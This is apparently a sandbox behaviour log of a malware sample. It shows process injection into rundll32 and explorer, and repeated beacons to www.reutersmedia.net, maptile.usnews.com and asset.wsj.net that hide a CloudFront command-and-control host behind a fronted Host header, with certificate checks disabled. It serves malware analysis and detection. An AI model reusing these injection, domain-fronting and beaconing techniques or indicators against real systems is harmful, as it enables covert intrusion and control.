Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 39
Fn
Data
Inet Read Response size = 4096, size_out = 3168 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x76bd96e0 True 1
Fn
Process Create process_name = C:\Windows\syswow64\rundll32.exe, os_pid = 0xac4, creation_flags = CREATE_SUSPENDED, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Process Open desired_access = PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Memory Allocate process_name = c:\windows\syswow64\rundll32.exe, address = 0x1c0000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_READWRITE, size = 163840 True 1
Fn
Memory Write process_name = c:\windows\syswow64\rundll32.exe, address = 0x1c0000, size = 162816 True 1
Fn
Data
Memory Protect process_name = c:\windows\syswow64\rundll32.exe, address = 0x1c0000, protection = PAGE_EXECUTE_READ, size = 163840 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x76bd96e0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x76bd96e0 True 1
Fn
Thread Get Context process_name = c:\windows\syswow64\explorer.exe, os_tid = 0xc78 True 1
Fn
Thread Set Context process_name = c:\windows\syswow64\explorer.exe, os_tid = 0xc78 True 1
Fn
Thread Resume process_name = c:\windows\syswow64\explorer.exe, os_tid = 0xc78 True 1
Fn
File Create filename = \\.\pipe\29a7ba79f8, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL False 1
Fn
System Sleep duration = 500 milliseconds (0.500 seconds) True 1
Fn
File Create filename = \\.\pipe\29a7ba79f8, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL True 1
Fn
System Get Time type = Ticks, time = 576734 True 2
Fn
System Sleep duration = 500 milliseconds (0.500 seconds) True 1
Fn
System Get Time type = Ticks, time = 577250 True 1
Fn
File Read filename = \\.\pipe\29a7ba79f8, size = 4, size_out = 4 True 1
Fn
Data
File Read filename = \\.\pipe\29a7ba79f8, size = 112080, size_out = 112080 True 1
Fn
Data
System Get Time type = Local Time, time = 2018-02-16 05:37:04 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/g349f3qf45t5g-k32, accept_types = 2943288, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=U=779b64e1a7ed737adededjdbdh , url = www.reutersmedia.net/safebrowsing/rd/g349f3qf45t5g-k32 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:11 (Local Time) True 1
Fn
System Sleep duration = 13952 milliseconds (13.952 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:22 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:22 (Local Time) True 1
Fn
System Sleep duration = 12288 milliseconds (12.288 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:32 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:32 (Local Time) True 1
Fn
System Sleep duration = 12682 milliseconds (12.682 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:43 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:43 (Local Time) True 1
Fn
System Sleep duration = 13689 milliseconds (13.689 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:54 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:54 (Local Time) True 1
Fn
System Sleep duration = 14740 milliseconds (14.740 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:04 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:04 (Local Time) True 1
Fn
System Sleep duration = 13561 milliseconds (13.561 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:15 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:15 (Local Time) True 1
Fn
System Sleep duration = 14340 milliseconds (14.340 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:26 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:26 (Local Time) True 1
Fn
System Sleep duration = 12911 milliseconds (12.911 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:36 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:36 (Local Time) True 1
Fn
System Sleep duration = 13917 milliseconds (13.917 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:47 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:47 (Local Time) True 1
Fn
System Sleep duration = 12608 milliseconds (12.608 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:58 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:58 (Local Time) True 1
Fn
System Sleep duration = 13399 milliseconds (13.399 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:39:09 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:39:09 (Local Time) True 1
Fn
System Sleep duration = 12046 milliseconds (12.046 seconds) True 1
Fn
Process #13: rundll32.exe
Information Value
ID #13
File Name c:\windows\syswow64\rundll32.exe
Command Line C:\Windows\syswow64\rundll32.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:08:19, Reason: Child Process
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:02:14
OS Process Information
Information Value
PID 0xac4
Parent PID 0xc84 (c:\windows\syswow64\explorer.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x60c
0xf44
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x00000000000c0000 0x000c0000 0x000dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000c0000 0x000c0000 0x000cffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d3fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e1fff Private Memory Readable, Writable True False False -
sfc.dll 0x000e0000 0x000e2fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x00000000000f0000 0x000f0000 0x00103fff Pagefile Backed Memory Readable True False False -
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001b1fff Private Memory Readable, Writable True False False -
private_0x00000000001c0000 0x001c0000 0x001e7fff Private Memory Readable, Writable True False False -
rundll32.exe.mui 0x001f0000 0x001f0fff Memory Mapped File Readable False False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory Readable, Writable True False False -
locale.nls 0x00210000 0x002cdfff Memory Mapped File Readable False False False -
private_0x00000000002d0000 0x002d0000 0x002d0fff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x002e0fff Private Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0035cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000360000 0x00360000 0x0045ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000460000 0x00460000 0x005e7fff Pagefile Backed Memory Readable True False False -
private_0x00000000005f0000 0x005f0000 0x005fffff Private Memory Readable, Writable True False False -
